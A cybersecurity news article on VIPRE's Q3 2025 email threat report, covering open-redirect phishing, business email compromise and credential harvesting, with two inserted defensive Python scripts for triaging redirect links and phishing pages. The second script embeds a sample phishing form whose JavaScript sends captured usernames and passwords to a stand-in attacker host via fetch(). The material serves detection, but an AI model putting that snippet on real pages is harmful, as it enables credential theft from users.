Threat Actors Attacking Outlook and Google Bypassing Traditional Email Defenses

Threat actors are systematically compromising Outlook and Google mailboxes with alarming success, leveraging sophisticated techniques that sidestep traditional email defenses entirely.

According to VIPRE’s Q3 2025 Email Threat Report, over 90% of phishing attacks specifically target these two dominant email ecosystems, representing a calculated strategic shift by attackers seeking to maximize impact while minimizing operational complexity.

The data reveals a troubling reality: as technical defenses have strengthened, attackers have adapted by weaponizing trusted infrastructure against itself.

Rather than deploying cutting-edge malware or zero-day exploits, cybercriminals are using deceptively simple tactics deployed with unprecedented sophistication.

Free email services, including Gmail and Outlook, accounted for 32% of all spam campaigns observed in Q3, with attackers leveraging these platforms’ inherent trustworthiness and easy account rotation to maintain high deliverability rates.

The Evasion Tactics

The most alarming trend involves links that abuse open redirects on legitimate sites. These attacks begin with a trusted domain name but append a query parameter that instructs the server to redirect the visitor to a malicious destination.

According to the report, 90.5% of phishing links employ this open redirect technique, compared to just 7.3% using direct malicious links.

This distinction matters significantly: an open redirect borrows the trusted reputation of the legitimate domain, so a filter that scores only the visible domain and never follows the redirect chain to its final destination will pass the link.
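To make the mechanism concrete, here is an added Python triage helper (not code from the article or from VIPRE) that dissects a link the way a redirect-aware filter would: it walks the query string, peels single and double percent-encoding, pulls out any parameter value that is itself an absolute or protocol-relative URL, follows nested redirectors, and flags targets whose registrable domain differs from the visible one. The domains, the parameter-name list and the last-two-labels eTLD+1 approximation are assumptions for illustration.

```python
"""Triage helper for open-redirect style phishing links.

Added example, not code from the VIPRE report or the article. Domains and
parameter names are illustrative; the eTLD+1 logic is an approximation.
"""
from urllib.parse import parse_qsl, unquote, urlsplit

# Query keys commonly used by redirectors (illustrative, not exhaustive).
REDIRECT_KEYS = {"url", "u", "r", "redirect", "redirect_uri", "redir", "next",
                 "goto", "target", "dest", "destination", "return", "returnurl",
                 "continue", "link", "to"}


def _site(host: str) -> str:
    """Crude registrable-domain approximation: keep the last two labels."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def _deep_unquote(value: str, rounds: int = 3) -> str:
    """Peel repeated percent-encoding (%2568 -> %68 -> h)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def embedded_targets(url: str, max_depth: int = 5) -> list:
    """List every query value that decodes to a URL, following nested redirectors.

    Each finding records the parameter name, the decoded target, its host,
    whether it stays on the visible link's site, and whether the parameter
    name is a well-known redirect key.
    """
    outer_site = _site(urlsplit(url).hostname or "")
    findings, seen, frontier = [], set(), [(url, 0)]
    while frontier:
        current, depth = frontier.pop()
        if current in seen or depth > max_depth:
            continue
        seen.add(current)
        for key, raw in parse_qsl(urlsplit(current).query, keep_blank_values=True):
            # parse_qsl already decoded one layer; only peel further if the
            # value does not yet look like a URL (double/triple encoding).
            candidate = raw if urlsplit(raw).hostname else _deep_unquote(raw)
            inner = urlsplit(candidate)
            # Absolute http(s) URLs and protocol-relative //host/path both leave the page.
            if inner.hostname and inner.scheme in ("http", "https", ""):
                findings.append({
                    "param": key,
                    "target": candidate,
                    "host": inner.hostname.lower(),
                    "same_site": _site(inner.hostname) == outer_site,
                    "known_redirect_key": key.lower() in REDIRECT_KEYS,
                })
                frontier.append((candidate, depth + 1))   # follow chained redirectors
    return findings


def is_suspicious_redirect(url: str) -> bool:
    """True when any embedded target leaves the visible domain's site."""
    return any(not f["same_site"] for f in embedded_targets(url))


if __name__ == "__main__":
    # Constructed sample: trusted-looking host, double-encoded off-site destination.
    link = "https://trusted.example/r?u=https%253A%252F%252Fevil.example%252Flogin"
    for finding in embedded_targets(link):
        print(finding)
    print("suspicious:", is_suspicious_redirect(link))
```

This static check only catches redirectors that carry the destination in the URL, which is the form the report describes; a redirector that resolves its target server-side shows nothing in the query string, so a click-time fetch that records the 3xx chain is the complementary control.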

Figure: Commercial Emails Crowd Out Phishing, Scams, and Malware.

Additionally, threat actors registered new domains at unprecedented rates in Q3, with a threefold spike in newly registered domain creation between July and August.

These disposable infrastructure elements enable rapid campaign launches followed by swift deactivation once security teams add the domains to denylists, a classic example of attackers staying one step ahead of reactive defenses.

Business Email Compromise (BEC) attacks constitute 51% of all malicious emails, maintaining their position as the most dangerous threat category.

A side-by-side comparison best illustrates the trends in the key phishing metrics we track every quarter.

Figure: Phishing Types.

What makes BEC particularly insidious is the social engineering component: impersonation tactics account for 63% of BEC attempts, with attackers increasingly moving conversations to unmonitored channels like WhatsApp to evade email-based detection systems entirely.

The report documents that CEOs remain the most impersonated individuals, followed by IT personnel, HR departments, and managers.

Attackers craft highly targeted scenarios around financial processes, HR functions, and confidential communications, all high-urgency scenarios designed to bypass human judgment under pressure.

The Credential Harvesting Operation

Phishing attachments reveal another critical vulnerability. The report found that 90% of phishing attachments target Outlook or Google specifically, with attackers favoring PDF attachments because they carry implicit legitimacy as business documents.

Figure: AI-generated vs Human-written Email Bodies.

A significant portion of the analyzed emails were AI-generated, indicating that threat actors are increasingly using automated content creation to make spam and phishing messages more convincing.

Figure: Newly Registered Domains (NRDs). Threefold increase in NRD creation between July and August, and then again between August and September.

Credential harvesting is the sole objective of these attachment campaigns, and threat actors are increasingly exfiltrating the captured credentials with the browser Fetch API rather than a conventional form POST, a technical evolution that indicates more capable operators are entering the space.
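As an added example (not the report's or the article's code), the following Python script shows what that distinction looks like to an analyst triaging a captured phishing page: it parses the HTML, finds forms that collect a password, and reports whether the fields are sent by a classic form POST to an action URL or by a script that intercepts the submit event and ships them with fetch() (or XMLHttpRequest / navigator.sendBeacon) to a host other than the page's own. The page URL, the host names and the two HTML snippets are constructed for this example.

```python
"""Static triage of a suspected credential-harvesting page.

Added example (not code from the VIPRE report or the article). Page URL,
host names and the HTML below are constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

SAMPLE_PAGE_URL = "https://trusted.example/secure-docs/view"

# Constructed page mimicking the fetch() variant: the form has no action, and an
# inline script hijacks submit and ships the fields to a third-party collector.
SAMPLE_HTML = """
<form id="login" method="post">
  <input type="email" name="username">
  <input type="password" name="password">
  <button type="submit">Sign in</button>
</form>
<script>
document.getElementById('login').addEventListener('submit', async (e) => {
  e.preventDefault();
  const body = JSON.stringify(Object.fromEntries(new FormData(e.target)));
  await fetch('https://collector.evil.example/api/v1/drop', {method: 'POST', body});
  location.href = 'https://trusted.example/secure-docs/view';
});
</script>
"""

# Constructed benign counterpart: a classic form POST to a same-site action.
BENIGN_HTML = '<form action="/login" method="post"><input name="u"><input type="password" name="p"></form>'

EXFIL_APIS = {                       # script-side transports worth flagging
    "fetch": re.compile(r"\bfetch\s*\("),
    "XMLHttpRequest": re.compile(r"\bXMLHttpRequest\b"),
    "sendBeacon": re.compile(r"navigator\.sendBeacon\s*\("),
}
URL_LITERAL = re.compile(r"""["'`](https?://[^"'`\s]+)["'`]""")
SUBMIT_HIJACK = re.compile(r"""addEventListener\s*\(\s*['"]submit['"]|\bonsubmit\s*=""", re.I)


class _PageScanner(HTMLParser):
    """Collect <form> elements (with input types) and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.forms, self.scripts = [], []
        self._form, self._in_script = None, False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "", "has_password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if (a.get("type") or "text").lower() == "password":
                self._form["has_password"] = True
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:          # script bodies arrive raw (no entity decoding)
            self.scripts[-1] += data


def _host(url: str) -> str:
    return (urlsplit(url).hostname or "").lower()


def triage(html: str, page_url: str) -> dict:
    """Report where the page's password form sends credentials, with a verdict."""
    scanner = _PageScanner()
    scanner.feed(html)
    page_host = _host(page_url)
    cred_forms = [f for f in scanner.forms if f["has_password"]]
    js = "\n".join(scanner.scripts)

    apis = sorted(name for name, rx in EXFIL_APIS.items() if rx.search(js))
    offsite = sorted({_host(u) for u in URL_LITERAL.findall(js) if _host(u) != page_host})
    offsite_actions = sorted({_host(f["action"]) for f in cred_forms
                              if _host(f["action"]) and _host(f["action"]) != page_host})
    hijacks_submit = bool(SUBMIT_HIJACK.search(js)) and "preventDefault" in js
    actionless = any(not f["action"] for f in cred_forms)

    if not cred_forms:
        verdict = "no_credential_form"
    elif apis and offsite and (hijacks_submit or actionless):
        verdict = "fetch_exfil"          # submit hijacked, credentials leave via script
    elif offsite_actions:
        verdict = "form_post_offsite"    # classic kit: <form action> on another host
    else:
        verdict = "form_post_same_site"

    return {"credential_forms": len(cred_forms), "exfil_apis": apis,
            "offsite_endpoints": offsite, "offsite_form_actions": offsite_actions,
            "hijacks_submit": hijacks_submit, "verdict": verdict}
```

The point the verdict captures is why the Fetch variant is harder to catch: a sandbox or proxy that only watches for an HTML form submission to an off-site action sees nothing, because the form has no action at all and the credentials travel in a script-initiated request whose destination is only visible by reading the JavaScript or by observing the browser's network traffic at click time.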

The detection gap is substantial. Malicious emails increased 13% year-over-year, with VIPRE processing 1.8 billion emails in the quarter and flagging 234 million as spam.

Yet the truly dangerous subset, roughly 150,000 newly discovered malicious attachments caught only through sandboxing, represents the attacks that would bypass traditional content- and link-based filters.

Threat actors are leveraging Apple’s TestFlight beta distribution platform to deliver malicious iOS builds to targeted users.

Figure: Apple TestFlight Attack Flow.

The geographic distribution compounds the problem. Over 60% of spam originated from U.S. IP addresses, not necessarily because attacks come from America, but because attackers deliberately rent U.S.-based servers whose strong reputation scores bypass security filters designed to flag suspicious international sources.

Organizations relying on legacy email security tools face an uncomfortable truth: signature-based detection and static denylists have become obsolete.

The attack landscape now demands behavioral analysis, real-time sandboxing, and AI-driven detection capable of identifying threats at click time.

Companies must implement mandatory multi-factor authentication to prevent credential compromise from escalating into account takeover, the critical failure point where attackers gain persistent access to organizational systems.

With Q3 data demonstrating that successful attacks exploit human psychology rather than technical vulnerabilities, a layered defense approach combining technology and user education has shifted from recommended practice to organizational necessity.
